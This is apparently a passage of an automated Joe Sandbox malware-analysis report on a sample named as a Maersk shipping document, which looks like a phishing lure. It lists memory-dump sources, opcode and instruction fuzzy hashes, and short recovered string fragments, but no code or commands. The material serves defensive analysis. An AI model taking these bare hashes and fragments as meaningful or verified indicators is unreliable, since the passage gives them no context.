                                                    • Instruction ID: abc17b4e3e20e9e0cac5059f1f7a50359bd029d8fe351e2877f713fed4920c76
                                                    • Opcode Fuzzy Hash: 1884bfe8e55178b8a3e3ee656a7e1a566b1461ad92a5f94fc8c1544e9bb197c5
                                                    • Instruction Fuzzy Hash: 00511D74A1060ACFCF10EFA8C8909ADF7B5FF89310B109669E516B7314EB30E989CB50
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7b8bd984b27d0e9138ad237cb00ae0eaad32350e2513f9ac206ab63c9530efea
                                                    • Instruction ID: 9e3c3e88095f08787f4f1e0f7ab6f83c96f8aa09c0dbe6f760f5f85fcc0b97dd
                                                    • Opcode Fuzzy Hash: 7b8bd984b27d0e9138ad237cb00ae0eaad32350e2513f9ac206ab63c9530efea
                                                    • Instruction Fuzzy Hash: BA418DB0B1120ADFDB18DF69D954AAEB7B6EF89301B188069E44697294DF30D980CB51
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bf76416e8dba2089cd42ab76faa4ec1fbe90c4f409bbbe812ba3d3c2eea546f7
                                                    • Instruction ID: f4d27de39a90d5dba117524d7830e6d020612d61640b8d036d400980b2f0890b
                                                    • Opcode Fuzzy Hash: bf76416e8dba2089cd42ab76faa4ec1fbe90c4f409bbbe812ba3d3c2eea546f7
                                                    • Instruction Fuzzy Hash: 5451A835A10609CFCB00EFA8D8849EDFBB5FF89304F00816AE515AB325EB30E955CB91
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ac4b7665bd1994472ddff1f24cb187b4d02d75a23da2d73d77fac412a442ba57
                                                    • Instruction ID: 7c51e17f002bc0905fb1455594a6726fd5ed6fcc499a08e084a7041e1d83a3c1
                                                    • Opcode Fuzzy Hash: ac4b7665bd1994472ddff1f24cb187b4d02d75a23da2d73d77fac412a442ba57
                                                    • Instruction Fuzzy Hash: 07415274A1060ACFCF10DF64C8905ADFBB1FF89310B1496A9E956E7355EB34E989CB80
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cc17e7fc26a1a3e4ca722197e028dcecdca1a81085a77534cf3c5f2c24bcb5fe
                                                    • Instruction ID: 7dba36cd37d94c58d9d8b599561f3d3d097e8cbd94797d9edef5fafdb10e7951
                                                    • Opcode Fuzzy Hash: cc17e7fc26a1a3e4ca722197e028dcecdca1a81085a77534cf3c5f2c24bcb5fe
                                                    • Instruction Fuzzy Hash: E541C2B1B58216DFEB118BAAC8C5ABEB7F1FF45304F40C026E15B97250C735A9468B12
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5ca26356706ddf32580b8d477157f2df03523a33f57ff99833591c00f2a39127
                                                    • Instruction ID: d0e22ebcfaee50f8324355169796826d196bf7c34c84b6f1a89b767f55ebdbf7
                                                    • Opcode Fuzzy Hash: 5ca26356706ddf32580b8d477157f2df03523a33f57ff99833591c00f2a39127
                                                    • Instruction Fuzzy Hash: E041F5B1A1C3918FC7159B79982817EBFB1EB8A211F1406ABD443C72A7DB340D49C7A2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d73f7f716450255a8dac71c45af86f96287ab5188cb828ae057e01e7af73e13a
                                                    • Instruction ID: ce423f41fae5d261a32a47098af9500c19dd2de97a25c8caaa1c227e18d04c57
                                                    • Opcode Fuzzy Hash: d73f7f716450255a8dac71c45af86f96287ab5188cb828ae057e01e7af73e13a
                                                    • Instruction Fuzzy Hash: 4931AEB1A10219DFDB14DFA9D94499DBBF6FF88310F14822AE501E7364EB709C45CB91
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a73a5702bd7ad8c921a407434ca9681e6a878eb749991c1b2032027a8b2a6b3f
                                                    • Instruction ID: 36dd8225c54f56327c871b9a3dd184e992d8598b0ea5ffd9878ca2a44661c225
                                                    • Opcode Fuzzy Hash: a73a5702bd7ad8c921a407434ca9681e6a878eb749991c1b2032027a8b2a6b3f
                                                    • Instruction Fuzzy Hash: 6B31E5B0614109CFD7249F59C4907AABBB5EB8B328F14842AC416BB349CB35DD468B91
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 54bd8d63574a62a210e094e856a229eaeaa5a126bfba51316751a76e582b5f0e
                                                    • Instruction ID: 33af58699ef87615d4f24088767bf1f25463d3c36eb8be4abb1399caa06b8eff
                                                    • Opcode Fuzzy Hash: 54bd8d63574a62a210e094e856a229eaeaa5a126bfba51316751a76e582b5f0e
                                                    • Instruction Fuzzy Hash: D23138B2900209AFCF10DFA9D884A9EBFF5FF48310F10846AE909A7211D735A955CBA0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fa3afa0f7c610ffb6798f9cd1dcf5b788733b10d476a8b76a881948fc0119888
                                                    • Instruction ID: 3ae281d30b970552ff03ab7e4c5a53add3d5e729bba1dfb365eeb4b1b91621bc
                                                    • Opcode Fuzzy Hash: fa3afa0f7c610ffb6798f9cd1dcf5b788733b10d476a8b76a881948fc0119888
                                                    • Instruction Fuzzy Hash: F431CFB1A01205AFDB14DF65D845BAEBBF6FF88311F10892AF406AB290DB74DD44CB90
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 90f9a0875119bf4db62eeb64e3f6e8bf8a656ab8a6b32474f5fb8758fc0123aa
                                                    • Instruction ID: 19d0351ea69e7081bf4a420c0473e04fb2e6a6f3cbf508cc58111a921eedfd59
                                                    • Opcode Fuzzy Hash: 90f9a0875119bf4db62eeb64e3f6e8bf8a656ab8a6b32474f5fb8758fc0123aa
                                                    • Instruction Fuzzy Hash: 9D31E8F0A2F152CBC7308AEEC890379B7B0AB47210F048177D516C72B5C6A88915C7B6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1335281506.000000000156D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0156D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_156d000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1335339347.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_157d000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2b237f1dfcffbe9ba5eab1775edf93c089eed2010efa5920ff869d49cd798aea
                                                    • Instruction ID: 70f02490f6f96aae09b34e92be6f1fd063b7242891376b1b7ad269548df41d63
                                                    • Opcode Fuzzy Hash: 2b237f1dfcffbe9ba5eab1775edf93c089eed2010efa5920ff869d49cd798aea
                                                    • Instruction Fuzzy Hash: CB21F2716042049FDB05DF98E5C1B2ABBB5FF84324F24C9ADE84A4F256C336D806CA61
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1335339347.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_157d000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6c296f70f864378c962dd345ba4ba6b34bf83aa74a6d202821c1fb37414454ba
                                                    • Instruction ID: efe53077ce823b7de1c31421c0d90c8b545367ea12a3794c58d8b9314c374276
                                                    • Opcode Fuzzy Hash: 6c296f70f864378c962dd345ba4ba6b34bf83aa74a6d202821c1fb37414454ba
                                                    • Instruction Fuzzy Hash: 2F213771504204DFCB01CF98E5C5B26BBB6FF84314F24C56DE8094F256C376E446CA61
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d61aa7a441948a4ee19ae437c520955de3e557239e60043a49d0f00913f5a520
                                                    • Instruction ID: 583ca7d712c803b6d6f1256c38478ee3057f6e1fa60017dd440e59433291ce37
                                                    • Opcode Fuzzy Hash: d61aa7a441948a4ee19ae437c520955de3e557239e60043a49d0f00913f5a520
                                                    • Instruction Fuzzy Hash: 9D213275A1020A8FCF44EF69C8948AEF7B5FF88300B518569D905F7351EB70A945CBA0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: abc6d4f64e6cca0a7309a1e7e0fee3e1d14e109953dddf6b01ac438c67631488
                                                    • Instruction ID: 42692d951b235fe998b82b6eb7488a123e6af4e6d84a196f708bd97782fa7ffe
                                                    • Opcode Fuzzy Hash: abc6d4f64e6cca0a7309a1e7e0fee3e1d14e109953dddf6b01ac438c67631488
                                                    • Instruction Fuzzy Hash: 3E2184F1E2BD15C7D734CA2AC94067DB7B1AB4B310F005217A512C72B0C774E5A0AB76
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: db106e6f1224742b792599ac0533d2fbb7a7a718d41f837c333e16d58c61afa5
                                                    • Instruction ID: ec6111d3ba884f54bbb8bbb3311aa8ddba1c55de557fe65b4fde3565d80ccae3
                                                    • Opcode Fuzzy Hash: db106e6f1224742b792599ac0533d2fbb7a7a718d41f837c333e16d58c61afa5
                                                    • Instruction Fuzzy Hash: FD1102717047545BC7259BBE9850AAFBFEAAFC5620F0444ABE449D7382ED609C0283E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 512a221674ea1d595109b1338b9f2e3ec977f65f272506ad8caf34359174ae2c
                                                    • Instruction ID: fbc29c001cf9f0bd8e280685c8cb3adead77472c34ed37e8a3fd696397e99c58
                                                    • Opcode Fuzzy Hash: 512a221674ea1d595109b1338b9f2e3ec977f65f272506ad8caf34359174ae2c
                                                    • Instruction Fuzzy Hash: 5711D3B17006028FDB10CB65E585BAABBF9FB49361F044129F819C7385EB70DD45CBA1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7bc44a90e463fcf797e7efe3fd397dde201f14559bb6ba42f8d8b967fbebf9e9
                                                    • Instruction ID: c32e224061bd02cec507ffba97a35d5d51b90e836eedabd859723c7f1181b923
                                                    • Opcode Fuzzy Hash: 7bc44a90e463fcf797e7efe3fd397dde201f14559bb6ba42f8d8b967fbebf9e9
                                                    • Instruction Fuzzy Hash: EB21D0B5900349AFCB10DF9AD884ADEBFF5FB49310F50841AE919A7210D375A954CFA1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1335281506.000000000156D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0156D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_156d000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b6d9f8954513a289108155b17418e8e788e8b427863a5550f59da745f4ae8560
                                                    • Instruction ID: daa5df3ee588271e62922fdc48035804f9c220e25850a3772df524664480b24a
                                                    • Opcode Fuzzy Hash: b6d9f8954513a289108155b17418e8e788e8b427863a5550f59da745f4ae8560
                                                    • Instruction Fuzzy Hash: 4C11DF72504240CFCB12CF44D9C4B1ABF72FB88314F24C6A9D8490B257C336D85ACBA1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8c7ddbe476df100ff9878bdb50d6a1a7fdd7b3fcbfe91ea1d0cde428f0095966
                                                    • Instruction ID: cfe0fd2578c717d5052f09507a6dfcb87f47b5ad0578408709c31275255a79a5
                                                    • Opcode Fuzzy Hash: 8c7ddbe476df100ff9878bdb50d6a1a7fdd7b3fcbfe91ea1d0cde428f0095966
                                                    • Instruction Fuzzy Hash: A811CC725092916FCB12CB68E8A18DA7FB5EF0622471980D7D084CB163E6308A1AD362
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1335339347.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_157d000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a3be7094ea246a7cddba5200c6ce82fad2e7d53e3ec886449491685f026f1607
                                                    • Instruction ID: adbc97a25ce36cefb4c9a8ee6dd056fc75196e855201c77801c54190eac56320
                                                    • Opcode Fuzzy Hash: a3be7094ea246a7cddba5200c6ce82fad2e7d53e3ec886449491685f026f1607
                                                    • Instruction Fuzzy Hash: 1511BE75504240CFDB02CF54E5C4B19BB72FF84214F24C6A9D8094F656C37AE44ACB51
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1335339347.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_157d000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a3be7094ea246a7cddba5200c6ce82fad2e7d53e3ec886449491685f026f1607
                                                    • Instruction ID: d99e6c9681ef98452cf35e71c403cd27435d6a6661ca275999f11f9c18ad4e86
                                                    • Opcode Fuzzy Hash: a3be7094ea246a7cddba5200c6ce82fad2e7d53e3ec886449491685f026f1607
                                                    • Instruction Fuzzy Hash: 32118B75504284DFDB06CF54D5C4B19BFB2FF84224F28C6A9E8494F656C33AD44ACBA1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 914e08de44aea547cb24c0cd71544fccf600a96f20c7c6f450ed547808a6c9f4
                                                    • Instruction ID: 7e0454d938d6baf7da86de5c7e9ab8e3fb95adac434c61eaea854a66fcdd127b
                                                    • Opcode Fuzzy Hash: 914e08de44aea547cb24c0cd71544fccf600a96f20c7c6f450ed547808a6c9f4
                                                    • Instruction Fuzzy Hash: 260136366052556FCB065F59AC4489EFFB5FF88221710812BF915C3352DB318D25DB91
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9ad35eaced199c50f1e9774df8216d7df1e3f4b11762e90ca8893c180cf19285
                                                    • Instruction ID: 628f8fbf82a4dada0581450483afa21a9e6fbcca5189f3b8f82d2a53098c834a
                                                    • Opcode Fuzzy Hash: 9ad35eaced199c50f1e9774df8216d7df1e3f4b11762e90ca8893c180cf19285
                                                    • Instruction Fuzzy Hash: 2EF0C2323042009FC3169F29F404A96BFA5EBD9722B10C03FE149C7241CF31C815CBA0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 986b7a2875e0f4d254f27ffc693ee42aa08150de72360ae8a8ee7999ed6582cf
                                                    • Instruction ID: 53043dc18b2bf47965bbff74e3bcebb3b0b4f0682862a43d462fbe2f36872089
                                                    • Opcode Fuzzy Hash: 986b7a2875e0f4d254f27ffc693ee42aa08150de72360ae8a8ee7999ed6582cf
                                                    • Instruction Fuzzy Hash: 67F024E582D290EFD30197AA58500B57FF1EDAB200B1401CBD587CB567E2288819D36B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 527d8878932a6af64b3abf13d602025e98fd4a3c9e9cbaf94eff06c14d5915e4
                                                    • Instruction ID: 9f5622adff493db750adcbd58f35849fd49acc176393a00cb3cab9d8dcea040c
                                                    • Opcode Fuzzy Hash: 527d8878932a6af64b3abf13d602025e98fd4a3c9e9cbaf94eff06c14d5915e4
                                                    • Instruction Fuzzy Hash: C0F01235704259AF9B055F59E84486EFFA6FB8C220710802AFD15C3351DB718C25DB90
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1351554773.00000000098F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_98f0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 4'_q$4'_q$4'_q$4|dq$4|dq$$_q
                                                    • API String ID: 0-271859681
                                                    • Opcode ID: c5a748b14558ea46e985a6d75f9a27202237335f495243cdd9a780ee75920baf
                                                    • Instruction ID: 7e41985a0ce660e307ec5b04af62e42e7212bc205efdd8f780f4b30d37ef6b56
                                                    • Opcode Fuzzy Hash: c5a748b14558ea46e985a6d75f9a27202237335f495243cdd9a780ee75920baf
                                                    • Instruction Fuzzy Hash: CFF1F0317012158FDB29DF7CC4A4A6E7BA2BF85340B2955ADE606CB361DB31DC42C7A1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1351129015.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7fa0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: qeD
                                                    • API String ID: 0-982779437
                                                    • Opcode ID: 8f259118f3cf9a8e07c2a0bd0277d48f8ae727d4d18278d97ddb6db5eac39e31
                                                    • Instruction ID: 26a051e3618f25037e08f5f50f9fa39455e15a1d1adaff836dbc04a5f71af982
                                                    • Opcode Fuzzy Hash: 8f259118f3cf9a8e07c2a0bd0277d48f8ae727d4d18278d97ddb6db5eac39e31
                                                    • Instruction Fuzzy Hash: 73E1F6B4E042199FCB14DFA9C5809AEBBF2FF89304F288169D414AB355CB34AD41CF61
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1351554773.00000000098F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_98f0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: d
                                                    • API String ID: 0-2564639436
                                                    • Opcode ID: 39f605a57f3a49b8778fd9cdda0aaa66488867afdb07b4a54c1ca97b4af042e1
                                                    • Instruction ID: 099240d3b9350ec2d2811b9da6e616c5db5e598559120aea389fcdac748c7456
                                                    • Opcode Fuzzy Hash: 39f605a57f3a49b8778fd9cdda0aaa66488867afdb07b4a54c1ca97b4af042e1
                                                    • Instruction Fuzzy Hash: A851D571D04229CBDB28DF66CC547DABBB2BB99301F4081AA941DAB354DB355A85CF40
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1351129015.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7fa0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 362b5cafe900216bc73027d25321b04aef8282282b68ede7bc3f54839e33f393
                                                    • Instruction ID: ca3fc8b3002b970217fc688cf08733e0d8b00a0c732004bfeada81ec20c54a77
                                                    • Opcode Fuzzy Hash: 362b5cafe900216bc73027d25321b04aef8282282b68ede7bc3f54839e33f393
                                                    • Instruction Fuzzy Hash: 23E115B4E002599FCB14DFA9C5809AEBBF2FF89305F288169D414AB355CB74AD41CFA1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1351129015.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7fa0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8b32186850ef4bd39ef2cdc77ab5eea19d215145b353ffde4c9b2d2812e498ec
                                                    • Instruction ID: 0b1972171e4ade402755c84c8e9b9b6ee86f3bdd8a2f4dc04630925ef3460582
                                                    • Opcode Fuzzy Hash: 8b32186850ef4bd39ef2cdc77ab5eea19d215145b353ffde4c9b2d2812e498ec
                                                    • Instruction Fuzzy Hash: 26E1D4B4E102199FCB14DFA9C5809AEBBF2FF89305F288169D414AB355DB34AD41CFA1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1351129015.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7fa0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ab213dd5cc19abe5857a0170192eeb275a128a500e62f66c858e27923aab8096
                                                    • Instruction ID: b7df04fb44295aa49075288db22b0df21c008807df181e1f988ec91ef99600ec
                                                    • Opcode Fuzzy Hash: ab213dd5cc19abe5857a0170192eeb275a128a500e62f66c858e27923aab8096
                                                    • Instruction Fuzzy Hash: 0DE1E5B4E002199FCB14DFA9C9809AEBBF2FF89305F288169D414AB355D734A941CFA1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1351129015.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7fa0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ea7dd578e80817d553b0731dbff7d7cca0339060938bbcffd6a6698ca0fbe5af
                                                    • Instruction ID: d096ea084bf52c2b8f1b76bd199ec80e9977563244f36bd4431ae17bfe88bc2c
                                                    • Opcode Fuzzy Hash: ea7dd578e80817d553b0731dbff7d7cca0339060938bbcffd6a6698ca0fbe5af
                                                    • Instruction Fuzzy Hash: 24E1F3B4E102199FCB14DFA9C5809AEBBF2FF89305F288169D414AB355DB34AD42CF61
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1351198590.00000000084A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_84a0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 45532fef5796af2fb043625300b3033a9db388744d779d412bacd5a18919789a
                                                    • Instruction ID: c94eb6771a3263753dbf03c832965e600942efc487222f0aff820943f80ba966
